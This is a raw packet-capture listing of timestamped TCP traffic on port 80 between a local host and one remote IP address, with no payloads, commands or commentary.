Oct 8, 2024 11:30:27.640991926 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.640991926 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.641001940 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641011953 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641020060 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.641024113 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641047955 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.641057014 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.641061068 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641072035 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641083002 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641092062 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641103029 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641112089 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641124964 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641136885 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641145945 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641148090 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.641148090 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.641148090 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.641158104 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641186953 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641196966 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641206026 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641206026 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.641206026 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.641225100 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641236067 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.641237020 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641248941 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641299009 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641335011 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641346931 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.641346931 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.641346931 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.641484022 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641494989 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641505003 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641515017 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641525030 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641535044 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641545057 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641555071 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641565084 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641575098 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641588926 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.641588926 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.641588926 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.641618967 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641633034 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.641681910 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641691923 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641700983 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641714096 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.641741037 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.641742945 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641753912 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641763926 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641774893 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641808987 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.641808987 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.641834021 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641843081 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641853094 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641927004 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641936064 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641946077 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641953945 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.641968012 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.641968966 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.641968966 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.642024040 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.680581093 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.680591106 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.680602074 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.680610895 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.680620909 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.680634975 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.680649042 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.680686951 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.680686951 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.729800940 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.729811907 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.729820967 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.729845047 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.729860067 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.729927063 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.729952097 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.729963064 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.729973078 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.729983091 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.729999065 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730009079 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730016947 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.730016947 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.730020046 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730030060 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730041027 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730045080 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.730057001 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730057001 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.730068922 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730078936 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730087996 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.730091095 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730103016 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730113029 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.730170012 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730209112 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730218887 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730245113 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.730245113 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.730257988 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730257988 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.730369091 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730417967 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.730426073 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730437040 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730467081 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730474949 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730482101 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.730488062 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730525970 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.730540991 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730551004 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730556011 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730564117 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730581999 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730593920 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730602980 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.730604887 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730616093 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730628014 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730640888 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.730640888 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.730654955 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730668068 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730679989 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730710983 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.730710983 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.730751991 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730763912 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730772972 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730782032 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730798006 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730806112 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.730807066 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730818033 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730829000 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730842113 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.730842113 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.730891943 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730915070 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730923891 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730953932 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.730953932 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.730979919 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.730990887 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.731019020 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.731023073 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.731034040 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.731040001 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.731045008 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.731046915 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.731096983 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.731097937 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.731110096 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.731121063 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.731131077 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.731168032 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.731168032 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.731198072 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.731209040 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.731219053 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.731229067 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.731240034 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.731250048 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.731254101 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.731297016 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.731297016 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.731328011 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.731338978 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.731359959 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.731419086 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.731420040 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.731431007 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.731441975 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.731451988 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.731477976 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.731496096 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.733050108 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.733068943 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.733083010 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.733097076 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.733098030 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.733108044 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.733119011 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.733129025 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.733158112 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.733158112 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.733175039 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.733190060 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.733201027 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.733210087 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.733218908 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.733234882 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.733244896 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.733252048 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.733256102 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.733266115 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.733275890 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.733277082 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.733277082 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.733302116 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.733313084 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.733318090 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.733325005 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.733338118 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.733347893 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.733372927 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.733372927 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.733398914 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.733429909 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.733439922 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.733449936 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.733534098 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.733540058 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.733550072 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.733560085 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.733572006 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.733576059 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.733589888 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.733653069 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.733848095 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.733947992 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.733958006 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.733968019 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.733978987 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.733988047 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.733999014 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.734004974 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.734009027 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.734033108 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.734076023 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.771372080 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.771527052 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.771543026 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.771553040 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.771578074 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.771580935 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.771589041 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.771600008 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.771620989 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.771667004 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.820641041 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.820660114 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.820669889 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.820682049 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.820693016 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.820693970 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.820732117 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.820743084 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.820751905 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.820755959 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.820771933 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.820775032 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.820775032 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.820784092 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.820792913 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.820805073 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.820815086 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.820823908 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.820823908 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.820844889 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.820868969 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.820873022 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.820883989 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.820893049 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.820898056 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.820909023 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.820918083 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.820928097 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.820938110 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.820949078 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.820955992 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.820955992 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.821031094 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.821065903 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.821120977 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.821147919 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.821161032 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.821201086 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.821201086 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.821203947 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.821214914 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.821230888 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.821240902 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.821252108 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.821259975 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.821270943 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.821275949 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.821297884 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.821307898 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.821317911 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.821326017 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.821336031 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.821346045 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.821346045 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.821352005 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.821362972 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.821373940 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.821382999 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.821388006 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.821388006 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.821432114 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.821432114 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.821702957 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.821872950 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.821887970 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.821897984 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.821927071 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.821983099 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.822092056 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.822102070 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.822113037 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.822124004 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.822129011 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.822138071 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.822154045 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.822163105 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.822176933 CEST	80	49794	63.250.38.167	192.168.2.6
Oct 8, 2024 11:30:27.822176933 CEST	49794	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:30:27.822176933 CEST	49794	80	192.168.2.6	63.250.38.167
